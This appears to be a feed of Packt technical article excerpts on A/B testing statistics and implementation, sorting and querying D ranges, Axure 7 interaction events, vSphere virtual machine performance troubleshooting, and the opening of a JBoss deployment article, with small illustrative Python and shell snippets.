Let's read this table. Each lettered column represents a scenario for how the significance of the results may change over the run of the test. The rows represent the number of observations that have been made. The row labeled Final represents the experiment's true finishing result, and the row labeled Stopped represents the result if the experiment is stopped as soon as a significant result is seen. The final results show us that out of eight different scenarios, the final result would be significant in four cases (B, D, G, and H). However, if the experiment is stopped prematurely, then it will be significant in seven cases (all but A). The test could drastically over-generate false positives. In fact, most statistical tests assume that the sample size is fixed before the test is run. It's exciting to get good results, so we'll design our system so that we can't easily stop it prematurely. We'll just take that temptation away. With this in mind, let's consider how we can implement this test.

Building the experiment

There are several options to actually implement the A/B test. We'll consider several of them and weigh their pros and cons. Ultimately, the option that works best for you really depends on your circumstances. However, we'll pick one for this article and use it to implement the test.

Looking at options to build the site

The first way to implement A/B testing is to use a server-side implementation. In this case, all of the processing and tracking is handled on the server, and visitors' actions would be tracked using GET or POST parameters on the URL for the resource that the experiment is attempting to drive traffic towards.
The steps for this process would go something like the following: A new user visits the site and requests the page that contains the button or copy that is being tested. The server recognizes that this is a new user and assigns the user a tracking number. It assigns the user to one of the test groups. It adds a row in a database that contains the tracking number and the test group that the user is part of. It returns the page to the user with the copy, image, or design that is reflective of the control or test group. The user views the returned page and decides whether or not to click on the button or link. If the server receives a request for the button's or link's target, it updates the user's row in the tracking table to show us that the interaction was a success, that is, that the user did a click-through or made a purchase. This way of handling it keeps everything on the server, so it allows more control and configuration over exactly how you want to conduct your experiment. A second way of implementing this would be to do everything using JavaScript (or ClojureScript, https://github.com/clojure/clojurescript). In this scenario, the code on the page itself would randomly decide whether the user belonged to the control or the test group, and it would notify the server that a new observation in the experiment was beginning. It would then update the page with the appropriate copy or image. Most of the rest of this interaction is the same as in the previous scenario. However, the complete steps are as follows: A new user visits the site and requests the page that contains the button or copy being tested. The server inserts some JavaScript to handle the A/B test into the page. As the page is being rendered, the JavaScript library generates a new tracking number for the user. It assigns the user to one of the test groups. It renders that page for the group that the user belongs to, which is either the control group or the test group.
It notifies the server of the user's tracking number and the group. The server takes this notification and adds a row for the observation in the database. The JavaScript in the browser tracks the user's next move either by directly notifying the server using an AJAX call or indirectly using a GET parameter in the URL for the next page. The server receives the notification whichever way it's sent and updates the row in the database. The downside of this is that having JavaScript take care of rendering the experiment might take slightly longer and may throw off the experiment. It's also slightly more complicated, because there are more parts that have to communicate. However, the benefit is that you can create a JavaScript library, easily throw a small script tag into the page, and immediately have a new A/B experiment running. In reality, though, you'll probably just use a service that handles this and more for you. However, it still makes sense to understand what they're providing for you, and that's what this article tries to do by helping you understand how to perform an A/B test so that you can make better use of these A/B testing vendors and services.
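Returning to the early-stopping discussion from the Framing the statistics section, the inflation of false positives can be seen in a seeded Monte Carlo sketch. All parameters here are made up; crucially, both pages share the same true rate, so every significant result is by construction a false positive:

```python
import math
import random

# Simulate many A/A experiments (same true rate on both pages) and compare
# two protocols: test significance only at the end, or stop at the first
# significant checkpoint. Stopping early can only match or inflate the
# false-positive count, because the final checkpoint is one of the peeks.

def significant(c_a, c_b, n, z_crit=1.96):
    p_pool = (c_a + c_b) / (2 * n)
    if p_pool in (0.0, 1.0):
        return False
    se = math.sqrt(p_pool * (1 - p_pool) * 2 / n)
    return abs(c_b - c_a) / n / se > z_crit

def simulate(trials=100, checkpoints=(500, 1000, 1500), rate=0.24, seed=7):
    rng = random.Random(seed)
    final_fp = stopped_fp = 0
    for _ in range(trials):
        a = b = n = 0
        flags = []
        for checkpoint in checkpoints:
            while n < checkpoint:
                a += rng.random() < rate
                b += rng.random() < rate
                n += 1
            flags.append(significant(a, b, n))
        final_fp += flags[-1]      # only look at the end
        stopped_fp += any(flags)   # stop at the first significant peek
    return final_fp, stopped_fp

final_fp, stopped_fp = simulate()
print(final_fp, stopped_fp)  # peeking matches or inflates the count
```

This mirrors the eight-scenario table: "Stopped" counts a run as positive if any checkpoint looked significant, while "Final" only consults the last one.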

Packt
22 May 2014
11 min read

Ranges

(For more resources related to this topic, see here.)

Sorting ranges efficiently

Phobos' std.algorithm includes sorting algorithms. Let's look at how they are used, what requirements they have, and the dangers of trying to implement range primitives without minding their efficiency requirements.

Getting ready

Let's make a linked list container that exposes an appropriate view, a forward range, and an inappropriate view, a random access range that doesn't meet its efficiency requirements. A singly-linked list can only efficiently implement forward iteration due to its nature; the only tool it has is a pointer to the next element. Implementing any other range primitives will require loops, which is not recommended. Here, however, we'll implement a fully functional range, with assignable elements, length, bidirectional iteration, random access, and even slicing on top of a linked list to see the negative effects this has when we try to use it.

How to do it…

We're going to both sort and benchmark this program.

To sort

Let's sort ranges by executing the following steps: Import std.algorithm. Determine the predicate you need. The default is (a, b) => a < b, which results in an ascending order when the sorting is complete (for example, [1,2,3]). If you want ascending order, you don't have to specify a predicate at all. If you need descending order, you can pass a greater-than predicate instead, as shown in the following line of code:

auto sorted = sort!((a, b) => a > b)([1,2,3]); // results: [3,2,1]

When doing string comparisons, the functions std.string.cmp (case-sensitive) or std.string.icmp (case-insensitive) may be used, as is done in the following code:

auto sorted = sort!((a, b) => cmp(a, b) < 0)(["b", "c", "a"]); // results: a, b, c

Your predicate may also be used to sort based on a struct member, as shown in the following code:

auto sorted = sort!((a, b) => a.value < b.value)(structArray);

Pass the predicate as the first compile-time argument.
The range you want to sort is passed as the runtime argument. If your range is not already sortable (if it doesn't provide the necessary capabilities), you can convert it to an array using the array function from std.range, as shown in the following code:

auto sorted = sort(fibonacci().take(10)); // won't compile, not enough capabilities
auto sorted = sort(fibonacci().take(10).array); // ok, good

Use the sorted range. It has a unique type from the input to signify that it has been successfully sorted. Other algorithms may use this knowledge to increase their efficiency.

To benchmark

Let's sort objects using benchmark by executing the following steps: Put our range and skeleton main function from the Getting ready section of this recipe into a file. Use std.datetime.benchmark to test the sorting of an array from the appropriate walker against the slow walker and print the results at the end of main. The code is as follows:

auto result = benchmark!(
    { auto sorted = sort(list.walker.array); },
    { auto sorted = sort(list.slowWalker); }
)(100);
writefln("Emulation resulted in a sort that was %d times slower.",
    result[1].hnsecs / result[0].hnsecs);

Run it. Your results may vary slightly, but you'll see that the emulated, inappropriate range functions are consistently slower. The following is the output:

Emulation resulted in a sort that was 16 times slower.

Tweak the size of the list by changing the initialization loop. Instead of 1000 entries, try 2000 entries. Also, try to compile the program with inlining and optimization turned on (dmd -inline -O yourfile.d) and see the difference. The emulated version will be consistently slower, and as the list becomes longer, the gap will widen. On my computer, a growing list size led to a growing slowdown factor, as shown in the following table:

List size    Slowdown factor
500          13
1000         16
2000         29
4000         73

How it works…

The interface to Phobos' main sort function hides much of the complexity of the implementation.
As long as we follow the efficiency rules when writing our ranges, things either just work or fail, telling us we must call array on the range before we can sort it. Building an array has a cost in both time and memory, which is why it isn't performed automatically (std.algorithm prefers lazy evaluation whenever possible for best speed and minimum memory use). However, as you can see in our benchmark, building an array is much cheaper than emulating unsupported functions. The sort algorithms require a full-featured range and will modify the range you pass to them instead of allocating memory for a copy. Thus, the range you pass must support random access, slicing, and either assignable or swappable elements. The prime example of such a range is a mutable array. This is why it is often necessary to use the array function when passing data to sort. Our linked list code used static if with a compile-time parameter as a configuration tool. The implemented functions include opSlice and properties that return ref. The ref value can only be used on function return values or parameters. Assignments to a ref value are forwarded to the original item. The opSlice function is called when the user tries to use the slice syntax: obj[start .. end]. Inside the beSlow condition, we broke the main rule of implementing range functions: avoid loops. Here, we see the consequences of breaking that rule; it defeated the algorithm's restrictions and optimizations, resulting in code that performs very poorly. If we follow the rules, we at least know where a performance problem will arise and can handle it gracefully. For ranges that do not implement the fast length property, std.algorithm includes a function called walkLength that determines the length by looping through all items (like we did in the slow length property).
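The cost of emulated random access can be reproduced in miniature by counting node hops instead of wall-clock time. This Python model is purely illustrative and is not the book's D linked list; it shows why each indexed access on a singly-linked list is O(n), so a full indexed pass is quadratic:

```python
# Count the node hops performed by emulated random access on a linked list.
# One pass of a[0], a[1], ..., a[n-1] costs 0 + 1 + ... + (n-1) hops,
# i.e. n*(n-1)/2 -- quadratic, where an array would do the same work in O(n).

class Node:
    def __init__(self, value, nxt=None):
        self.value, self.nxt = value, nxt

class LinkedList:
    def __init__(self, values):
        self.head = None
        self.hops = 0
        for v in reversed(values):
            self.head = Node(v, self.head)

    def __getitem__(self, index):        # emulated O(n) random access
        node = self.head
        for _ in range(index):
            node = node.nxt
            self.hops += 1
        return node.value

for size in (500, 1000, 2000):
    lst = LinkedList(list(range(size)))
    for i in range(size):                # one full indexed pass
        lst[i]
    print(size, lst.hops)                # hops grow quadratically with size
```

The widening gap in the benchmark table above has the same shape: doubling the list size roughly quadruples the hidden traversal work.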
The walkLength function has a longer name than length precisely to warn you that it is a slower function, running in O(n) (linear with length) time instead of O(1) (constant) time. Slower functions are OK, they just need to be explicit so that the user isn't surprised. See also The std.algorithm module also includes other sorting algorithms that may fit a specific use case better than the generic (automatically specialized) function. See the documentation at http://dlang.org/phobos/std_algorithm.html for more information. Searching ranges Phobos' std.algorithm module includes search functions that can work on any ranges. It automatically specializes based on type information. Searching a sorted range is faster than an unsorted range. How to do it… Searching has a number of different scenarios, each with different methods: If you want to know if something is present, use canFind. Finding an item generically can be done with the find function. It returns the remainder of the range, with the located item at the front. When searching for a substring in a string, you can use haystack.find(boyerMooreFinder(needle)). This uses the Boyer-Moore algorithm which may give better performance. If you want to know the index where the item is located, use countUntil. It returns a numeric index into the range, just like the indexOf function for strings. Each find function can take a predicate to customize the search operation. When you know your range is sorted but the type doesn't already prove it, you may call assumeSorted on it before passing it to the search functions. The assumeSorted function has no runtime cost; it only adds information to the type that is used for compile-time specialization. How it works… The search functions in Phobos make use of the ranges' available features to choose good-fit algorithms. Pass them efficiently implemented ranges with accurate capabilities to get best performance. 
The find function returns the remainder of the data because this is the most general behavior; it doesn't need random access, like returning an index, and doesn't require an additional function if you are implementing a function to split a range on a given condition. The find function can work with a basic input range, serving as a foundation to implement whatever you need on top of it, and it will transparently optimize to use more range features if available.

Using functional tools to query data

The std.algorithm module includes a variety of higher-order ranges that provide tools similar to functional tools. Here, we'll see how D code can be similar to a SQL query. A SQL query is as follows:

SELECT id, name, strcat("Title: ", title) FROM users WHERE name LIKE 'A%' ORDER BY id DESC LIMIT 5;

How would we express something similar in D?

Getting ready

Let's create a struct to mimic the data table and make an array with some demo information. The code is as follows:

struct User {
    int id;
    string name;
    string title;
}

User[] users;
users ~= User(1, "Alice", "President");
users ~= User(2, "Bob", "Manager");
users ~= User(3, "Claire", "Programmer");

How to do it…

Let's use functional tools to query data by executing the following steps: Import std.algorithm. Use sort to translate the ORDER BY clause. If your dataset is large, you may wish to sort it at the end. This will likely require a call to an array, but it will only sort the result set instead of everything. With a small dataset, sorting early saves an array allocation. Use filter to implement the WHERE clause. Use map to implement the field selection and functions. The std.typecons.tuple module can also be used to return specific fields. Use std.range.take to implement the LIMIT clause. Put it all together and print the result. The code is as follows:

import std.algorithm;
import std.range;
import std.typecons : tuple; // we use this below

auto resultSet = users.
    sort!((a, b) => a.id > b.id).
// the ORDER BY clause
    filter!((item) => item.name.startsWith("A")). // the WHERE clause
    take(5).
    map!((item) => tuple(item.id, item.name, "Title: " ~ item.title)); // the field list and transformations

import std.stdio;
foreach(line; resultSet)
    writeln(line[0], " ", line[1], " ", line[2]);

It will print the following output:

1 Alice Title: President

How it works…

Many SQL operations or list comprehensions can be expressed in D using some building blocks from std.algorithm. They all work generally the same way; they take a predicate as a compile-time argument. The predicate is passed one or two items at a time and you perform a check or transformation on it. Chaining together functions with the dot syntax, like we did here, is possible thanks to uniform function call syntax. It could also be rewritten as map!pred(take(5, filter!pred(sort!pred(users)))). It depends on the author's preference, as both styles work exactly the same way. It is important to remember that all std.algorithm higher-order ranges are evaluated lazily. This means no computations, such as looping over or printing, are actually performed until they are required. Writing code using filter, take, map, and many other functions is akin to preparing a query. To execute it, you may print or loop the result, or if you want to save it to an array for use later, simply call .array at the end.

There's more…

The std.algorithm module also includes other classic functions, such as reduce. It works the same way as the others. D has a feature called pure functions. The functions in std.algorithm are conditionally pure, which means they can be used in pure functions if and only if the predicates you pass are also pure. With lambda functions, like we've been using here, the compiler will often automatically deduce this for you. If you use other functions you define as predicates and want to use them in a pure function, be sure to mark them pure as well.
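The same query pipeline translates almost mechanically to Python's lazy building blocks, which may help readers coming from other languages; the tuple layout mirrors the D example:

```python
from itertools import islice

# The SQL query expressed with lazy building blocks: sorted for ORDER BY,
# a generator expression for WHERE, islice for LIMIT, and a comprehension
# for the field list. The generator stages run only when iterated.

users = [(1, "Alice", "President"), (2, "Bob", "Manager"), (3, "Claire", "Programmer")]

ordered  = sorted(users, key=lambda u: u[0], reverse=True)   # ORDER BY id DESC
matching = (u for u in ordered if u[1].startswith("A"))      # WHERE name LIKE 'A%'
limited  = islice(matching, 5)                               # LIMIT 5
result   = [(uid, name, "Title: " + title) for uid, name, title in limited]

print(result)  # [(1, 'Alice', 'Title: President')]
```

As in D, the intermediate stages are lazy: matching and limited do no work until the final list comprehension consumes them.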
See also Visit http://dconf.org/2013/talks/wilson.html where Adam Wilson's DConf 2013 talk on porting C# to D showed how to translate some real-world LINQ code to D Summary In this article, we learned how to sort ranges in an efficient manner by using sorting algorithms. We learned how to search a range using different functions. We also learned how to use functional tools to query data (similar to a SQL query). Resources for Article: Further resources on this subject: Watching Multiple Threads in C# [article] Application Development in Visual C++ - The Tetris Application [article] Building UI with XAML for Windows 8 Using C [article]

Packt
22 May 2014
11 min read

Creating Basic Interactions

(For more resources related to this topic, see here.) "Learning is not attained by chance, it must be sought for with ardor and diligence." - Abigail Adams We joke that Elizabeth is a true designer in the sense that her right brain will be on fire when she approaches her work, so shifting to logic is tricky for her. Despite this, she has been able to build rather sophisticated prototypes. So, while Axure 7 supports the creation of highly advanced rapid prototypes, the key to success for someone who does not have pseudo code running easily through their mind is: approaching interactivity with an open mind, writing down in plain language what the desired interaction should be, and the willingness to seek help from a colleague or online tutorials. The basic model of creating interactivity in an Axure prototype involves four hierarchical building blocks: Interactions, Events, Cases, and Actions. Interactions are triggered by events, which cause cases to execute actions. These four topics are the focus of this article. Axure Interactions Client expectations of a good user experience continue to rise, and it is clear that we are in the midst of an enormous transition in software design. This, along with the spread of Responsive Web Design (RWD), has placed UX front and center of the web design process. Early in that process is the need to "sell" your vision of the user experience to stakeholders, and you have a better chance of success if they are engaged as early as possible, starting at the wireframe level. There is less tolerance and satisfaction with static annotated wireframes, which require an effort on the part of stakeholders to imagine the fluidity of the expected functionality. Axure enables designers to rapidly simulate highly engaging user experiences that can be reviewed and tested on target devices as static wireframes are transformed into dynamic prototypes.
In this article, we focus on how to make the transition from static to interactive, using simple, yet wickedly effective interactions. Interactions are Axure's term for the building blocks that turn static wireframes into clickable, interactive HTML prototypes. Axure shields us from the complexities of coding by providing a simple, wizard-like interface for defining instructions and logic in English. Each time we generate the HTML prototype, Axure converts the interactions into real code (JavaScript, HTML, and CSS), which a web browser can understand. Note, however, that this is not production-grade code.

Each Axure interaction is composed, in essence, of three basic units of information: when, where, and what.

When does an interaction happen?: The Axure terminology for "when" is events, and some examples of discrete events include:

When the page is loaded in the browser.
When a user clicks on a widget, such as a button.
When the user tabs out of a form field.

A list of events can be seen on the Interactions tab in the Widget Interactions and Notes pane on the right-hand side of the screen. You will also find the related list of events under the Page Interactions tab, which is located under your main workspace.

Where can we find the interaction?: An interaction is attached either to a widget, such as a rectangle, radio button, or drop-down list; a page; or a master wireframe. You create widget interactions using the options in the Widget Properties pane, and page and master interactions using the options in the Page Properties pane. An event's responses are grouped into cases, and a single event can have one or more cases.

What should happen?: The Axure terminology for "what" is actions. Actions define the outcome of the interaction. For example, when a page loads, you can instruct Axure on how the page should behave and what it will display when it is first rendered on the screen.
More examples could be: when the user clicks on a button, it will link to another page; when the user tabs out of a form field, the input will be validated and an error message displayed if needed. Ensure that all of the actions you want to include for a given case or scenario are in the same case.

Multiple Cases

Sometimes, an event could have alternative paths, each with its own case(s). The determination of which path to trigger is controlled with conditional logic, which we will cover later in this article.

Axure Events

In general, Axure interactions are triggered by two types of events, which are as follows:

Page and master level events, which can be triggered automatically, such as when the page is loaded in the browser, or as a result of a user action, such as scrolling.
Widget level events, triggered when a user directly interacts with a widget on the page. These are typically triggered directly by the user, such as clicking on a button, or as a result of a user action which causes a number of events to follow.

Page level Events

Think of this concept as a staging setup, an orchestration of actions that takes place behind the scenes and is executed as the page gets rendered in the browser. Moreover, it is a setup to which you can apply conditional logic and variables, and deliver a contextual rendering of the page. In short, events, which can be applied to pages and masters, will likely become one of your most frequently used methods to control your prototype. Keep in mind the order in which the interactions you build into the prototype will be executed by the browser. The following Image 1 screenshot illustrates the OnPageLoad event as an example:

The browser gets a request to load a page (Image 1, A), either because it is the first time you launch the prototype or as a result of navigation from one prototype page to another.
The browser first checks for OnPageLoad interactions. An OnPageLoad event (B) may be associated with the loading page (C), a master used on the page (D), or both.
If OnPageLoad exists, the browser first evaluates page-level interactions, and then master-level interactions. The benefit of this order of operations is that you can set the value of a variable in the page's OnPageLoad interaction and pass that variable to the master's OnPageLoad interaction. It sounds a bit complicated, perhaps.
If the OnPageLoad interaction includes condition(s) (E), the browser will evaluate the logic and execute the appropriate action (F and/or G). Otherwise, if the OnPageLoad event does not include a condition, the browser will execute the interaction (H).
The requested page is rendered (I) per the interaction.

Image 1

The following list describes the events offered at a page level:

OnPageLoad: This event will trigger assigned action(s) that will impact how the page is initially rendered after it loads.
OnWindowResize: This event will trigger assigned action(s) when the browser is resized.
OnWindowScroll: This event will trigger assigned action(s) when the user scrolls the browser window.
OnPageClick: This event will trigger assigned action(s) when the user clicks on any empty part of the page (not clicking on any widget).
OnPageDoubleClick: This event will trigger assigned action(s) when the user double-clicks on any empty part of the page (not clicking on any widget).
OnContextMenu: This event will trigger assigned action(s) when the user right-clicks on any empty part of the page (not clicking on any widget).
OnMouseMove: This event will trigger assigned action(s) when the mouse pointer is moved anywhere on the page.
OnPageKeyUp: This event will trigger assigned action(s) when a pressed key is released.
OnPageKeyDown: This event will trigger assigned action(s) when a key is pressed.
OnAdaptiveViewChange: This event will trigger assigned action(s) on a switch from one adaptive view to another.
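The page-then-master order of evaluation described above can be re-enacted outside Axure. The following shell sketch is purely illustrative (the variable names are invented, and Axure's real generated code is JavaScript, not shell): the page-level OnPageLoad sets a variable, then the master-level OnPageLoad evaluates its conditional cases in order and the first matching case wins.

```shell
# Toy re-enactment of the OnPageLoad flow in Image 1.
logged_in=false   # illustrative variable, not an Axure built-in

# Page-level OnPageLoad: set a variable for the master to read
if [ "$logged_in" = true ]; then visitor_type=member; else visitor_type=guest; fi

# Master-level OnPageLoad: cases are evaluated in order;
# the first case whose condition matches is executed
case "$visitor_type" in
  member) echo "Case 1: show the welcome panel" ;;
  *)      echo "Case 2: show the login form" ;;
esac
```

Flipping `logged_in` to `true` sends the flow through the first case instead, which is exactly the kind of contextual rendering the OnPageLoad event enables.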
Widget-level Events

The OnClick event, whether using a mouse or tapping a finger, is one of the fundamental triggers of modern user-computer interactions. In Axure, it is one of several events you can associate with a widget. The following Image 2 screenshot illustrates how widget-level events are processed:

The user interacts with a widget by initiating an event (Image 2, A), such as OnClick, which is associated with that widget (B). The type of widget (Button, Checkbox, and so on) constrains the possible response the user can expect (D). For example, before clicking on a button, the user may move the mouse over it, and the visual appearance of the button will change in response to the OnMouseEnter event. Axure also includes events for mobile devices, where fingers are the means of the user's direct manipulation of the interface.
The browser will check if conditional logic is tied to the widget event (E). For example, you may have created an interaction in which a rollover event will display different states of a dynamic panel based on some variable. The browser will evaluate the condition and execute the action(s) (F and/or G). If no conditions exist, the browser will execute the action(s) associated with the widget (H).
Based on the actions tied to the event, the browser will update the screen or load some other screen (I).

Image 2

The following list covers Axure's inventory of events which can be applied to widgets and dynamic panels; events marked "(dynamic panels)" apply to dynamic panels, and each widget has its own set of possible events:

OnClick: The user clicks on an element.
OnPanelStateChange (dynamic panels): Dynamic panels may have multiple states, and this event can be used to trigger action(s) when a dynamic panel changes states.
OnDragStart (dynamic panels): This event pinpoints the moment the user begins to drag a dynamic panel.
OnDrag (dynamic panels): This event spans the duration of the dynamic panel being dragged.
OnDragDrop (dynamic panels): This event pinpoints the moment the user finishes dragging the dynamic panel. This could be an opportunity to validate that, for example, the user placed the widget in the right place.
OnSwipeLeft (dynamic panels): The event will trigger assigned action(s) when the user swipes from right to left.
OnSwipeRight (dynamic panels): The event will trigger assigned action(s) when the user swipes from left to right.
OnSwipeUp (dynamic panels): The event will trigger assigned action(s) when the user swipes upwards.
OnSwipeDown (dynamic panels): The event will trigger assigned action(s) when the user swipes downwards.
OnDoubleClick: The event will trigger assigned action(s) when the user double-clicks on an element.
OnContextMenu: The event will trigger assigned action(s) when the user right-clicks on an element.
OnMouseDown: The event will trigger assigned action(s) when the user clicks on the element but has yet to release the mouse button.
OnMouseUp: The event will trigger assigned action(s) on the release of the mouse button.
OnMouseMove: The event will trigger assigned action(s) when the user moves the cursor.
OnMouseEnter: The event will trigger assigned action(s) when the cursor is moved over an element.
OnMouseOut: The event will trigger assigned action(s) when the cursor is moved away from an element.
OnMouseHover: The event will trigger assigned action(s) when the cursor is placed over an element. This is great for custom tooltips.
OnLongClick: This is great to use on a touchscreen. Use this when a user clicks on the element and holds it.
OnKeyDown: The event will trigger assigned action(s) as the user presses a key on the keyboard. It can be attached to any widget, but the action is only sent to the widget that has focus.
OnKeyUp: The event will trigger assigned action(s) as the user releases a pressed key on the keyboard.
OnMove: The event will trigger assigned action(s) when the referenced widget moves.
OnShow: The event will trigger assigned action(s) when the visibility state of the referenced widget changes to Show.
OnHide: The event will trigger assigned action(s) when the visibility state of the referenced widget changes to Hide.
OnScroll (dynamic panels): The event will trigger assigned action(s) when the user is scrolling. Good to use in conjunction with the Pin to Browser feature.
OnResize (dynamic panels): The event will trigger assigned action(s) when it detects that the referenced panel has been resized.
OnLoad (dynamic panels): The dynamic panel is initiated when a page is loaded.
OnFocus: The event will trigger assigned action(s) when the widget comes into focus.
OnLostFocus: The event will trigger assigned action(s) when the widget loses focus.
OnSelectionChange: This event is only applicable to drop-down lists and is typically used with a condition: when the selected option is X, show this. Use this when you want a selection to trigger action(s) that will change something on the wireframe.
OnCheckedChange: This event is only applicable to radio buttons and checkboxes. Use this when you want a selection to trigger action(s) that will change something on the wireframe.

Packt
21 May 2014
8 min read

Virtual Machine Design

(For more resources related to this topic, see here.)

Causes of virtual machine performance problems

In a perfect virtual infrastructure, you will never experience any performance problems and everything will work well within the budget that you allocated. But should there be circumstances that arise in this perfect utopian datacenter you've designed, hopefully this section will help you to identify and resolve the problems more easily.

CPU performance issues

The following is a summary of some of the common CPU performance issues you may experience in your virtual infrastructure. While this is not an exhaustive list of every possible problem you can experience with CPUs, it can help guide you in the right direction to solve CPU-related performance issues:

High ready time: When your ready time is above 10 percent, this could indicate CPU contention and could be impacting the performance of any CPU-intensive applications. This is not a guarantee of a problem; applications which are not nearly as sensitive can still report high values and perform well within guidelines. CPU ready time is reported in milliseconds; to convert it to a percentage, see KB 2002181.
High costop time: The costop time will often correlate to contention in multi-vCPU virtual machines. Costop time exceeding 10 percent could cause challenges when vSphere tries to schedule all vCPUs in your multi-vCPU servers.
CPU limits: As discussed earlier, you will often experience performance problems if your virtual machine tries to use more resources than have been configured in your limits.
Host CPU saturation: When the vSphere host utilization runs above 80 percent, you may experience host saturation issues. This can introduce performance problems across the host as the CPU scheduler tries to assign resources to virtual machines.
Guest CPU saturation: This is experienced on high utilization of vCPU resources within the operating system of your virtual machines.
This can be mitigated, if required, by adding additional vCPUs to improve the performance of the application.
Misconfigured affinity: Affinity is enabled by default in vSphere; however, if manually configured to tie a VM to a specific physical CPU, problems can be encountered. This is often experienced when creating a VM with affinity settings and then cloning the VM. VMware advises against manually configuring affinity.
Oversizing vCPUs: When assigning multiple vCPUs to a virtual machine, you want to ensure that the operating system is able to take advantage of the CPUs and threads, and that your applications can support them. The overhead associated with unused vCPUs can impact other applications and resource scheduling within the vSphere host.
Low guest usage: Sometimes, poor performance accompanied by low CPU utilization indicates that the problem actually lies with I/O or memory. An underused CPU is often a good guiding indicator that the bottleneck is caused by other resources or by configuration.

Memory performance issues

Additionally, the following list is a summary of some common memory performance issues you may experience in your virtual infrastructure. Given the way VMware vSphere handles memory management, there is a unique set of challenges in troubleshooting and resolving performance problems as they arise:

Host memory: Host memory is both a finite and very limited resource. While VMware vSphere incorporates some creative mechanisms to leverage and maximize the amount of available memory through features such as page sharing, memory management, and resource-allocation controls, there are several memory features that will only take effect when the host is under stress.
Transparent page sharing: This is the method by which redundant copies of pages are eliminated. TPS, enabled by default, will break up regular pages into 4 KB chunks for better performance.
When virtual machines have large physical pages (2 MB instead of 4 KB), vSphere will not attempt to enable TPS for these, as the likelihood of multiple 2 MB chunks being similar is less than that of 4 KB chunks. This can cause a system to experience memory overcommit, and performance problems may be experienced; if memory stress is then experienced, vSphere may break these 2 MB chunks into 4 KB chunks to allow TPS to consolidate the pages.
Host memory consumed: When measuring utilization for capacity planning, the value of host memory consumed can often be deceiving as it does not always reflect the actual memory utilization. Instead, active memory or memory demand should be used as a better guide of actual memory utilized, as features such as TPS can reflect a more accurate picture of memory utilization.
Memory over-allocation: Memory over-allocation will usually be fine for most applications in most environments. It is typically safe to over-allocate memory by 20 percent, especially with similar applications and operating systems. The more similarity you have between your applications and environment, the higher you can take that number.
Swap to disk: If you over-allocate your memory too aggressively, you may start to experience memory swapping to disk, which can result in performance problems if not caught early enough. It is best, in those circumstances, to evaluate which guests are swapping to disk to help correct either the application or the infrastructure as appropriate.

For additional details on vSphere memory management and monitoring, see KB 2017642.

Storage performance issues

When it comes to storage performance issues within your virtual machine infrastructure, there are a few areas you will want to pay particular attention to.
Although most storage-related problems you are likely to experience will depend more upon your backend infrastructure, the following are a few things you can look at when identifying whether it is the VM's storage or the SAN itself:

Storage latency: Latency experienced at the storage level is usually expressed as a combination of the latency of the storage stack, guest operating system, VMkernel virtualization layer, and the physical hardware. Typically, if you experience slowness and are noticing high latencies, one or more aspects of your storage could be the cause.
Three layers of latency: ESXi and vCenter typically report on three primary latencies. These are Guest Average Latency (GAVG), Device Average Latency (DAVG), and Kernel Average Latency (KAVG).
Guest Average Latency (GAVG): This value is the total amount of latency that ESXi is able to detect. This is not to say that it is the total amount of latency being experienced, but just the figure that ESXi is reporting against. So if you're experiencing a 5 ms latency with GAVG and a performance application such as Perfmon is identifying a storage latency of 50 ms, something within the guest operating system is incurring a penalty of 45 ms of latency. In circumstances such as these, you should investigate the VM and its operating system to troubleshoot.
Device Average Latency (DAVG): Device Average Latency tends to focus on the more physical side of things; for instance, whether the storage adapters, HBA, or interface is experiencing any latency in communication with the backend storage array. Problems experienced here tend to fall more on the storage itself and are less easily troubleshot within ESXi itself, some exceptions being firmware or adapter drivers, which may be introducing problems, or the queue depth of your HBA. More details on queue depth can be found in KB 1267.
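Putting numbers to the GAVG example above makes the layering concrete. The following sketch uses made-up values (real figures come from esxtop or vCenter performance charts); the kernel-layer share is the difference between what ESXi reports and the device latency, and the in-guest penalty is the difference between what the guest OS measures and what ESXi reports:

```shell
# Illustrative values only; substitute real esxtop/vCenter readings.
gavg_ms=5       # total latency ESXi can see (GAVG)
davg_ms=3       # device/physical share (DAVG)
perfmon_ms=50   # latency measured inside the guest, e.g. by Perfmon

kavg_ms=$((gavg_ms - davg_ms))       # kernel-layer share (GAVG - DAVG)
guest_ms=$((perfmon_ms - gavg_ms))   # penalty added inside the guest OS
echo "KAVG=${kavg_ms}ms in-guest penalty=${guest_ms}ms"
```

Here the device accounts for 3 ms, the VMkernel for 2 ms, and the remaining 45 ms is incurred inside the guest, pointing the investigation at the VM rather than the SAN.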
Kernel Average Latency (KAVG): Kernel Average Latency is actually not a specific number, as it is a calculation of "Total Latency - DAVG = KAVG"; thus, when using this metric you should be wary of a few values. The typical value of KAVG should be zero; anything slightly greater may just be I/O moving through the kernel queue and can generally be dismissed. When your latencies are consistently 2 ms or greater, this may indicate a storage performance issue, and your VMs, adapters, and queues should be reviewed for bottlenecks or problems.

The following are some KB articles that can help you further troubleshoot virtual machine storage:

Using esxtop to identify storage performance issues (KB 1008205)
Troubleshooting ESX/ESXi virtual machine performance issues (KB 2001003)
Testing virtual machine storage I/O performance for VMware ESX and ESXi (KB 1006821)

Network performance issues

Lastly, when it comes to addressing network performance issues, there are a few areas you will want to consider. As with storage performance issues, a lot of these are often addressed by the backend networking infrastructure. However, there are a few items you'll want to investigate within the virtual machines to ensure network reliability:

Networking error, IP already assigned to another adapter: This is a common problem experienced after V2V or P2V migrations, which result in ghosted network adapters. VMware KB 1179 guides you through the steps to remove these ghosted network adapters.
Speed or duplex mismatch within the OS: Left at the defaults, the virtual machine will use auto-negotiation to get maximum network performance; if configured down from that speed, this can introduce virtual machine limitations.
Choose the correct network adapter for your VM: Newer operating systems should support the VMXNET3 adapter, while some virtual machines, either legacy or upgraded from previous versions, may run older network adapter types.
See KB 1001805 to help decide which adapters are correct for your usage.

The following are some KB articles that can help you further troubleshoot virtual machine networking:

Troubleshooting virtual machine network connection issues (KB 1003893)
Troubleshooting network performance issues in a vSphere environment (KB 1004097)

Summary

With this article, you should be able to inspect existing VMs while following design principles that will lead to correctly sized and deployed virtual machines. You should also have a better understanding of when your configuration is meeting your needs, and how to go about identifying performance problems associated with your VMs.

Resources for Article:

Further resources on this subject:

Introduction to vSphere Distributed switches [Article]
Network Virtualization and vSphere [Article]
Networking Performance Design [Article]
Packt
21 May 2014
8 min read

Running our first web application

(For more resources related to this topic, see here.)

The standalone/deployments directory, as in previous releases of JBoss Application Server, is the location used by end users to perform their deployments, and applications are automatically deployed into the server at runtime. The artifacts that can be deployed are as follows:

WAR (Web Application Archive): This is a JAR file used to distribute a collection of JSPs (JavaServer Pages), servlets, Java classes, XML files, libraries, static web pages, and several other features that make up a web application.
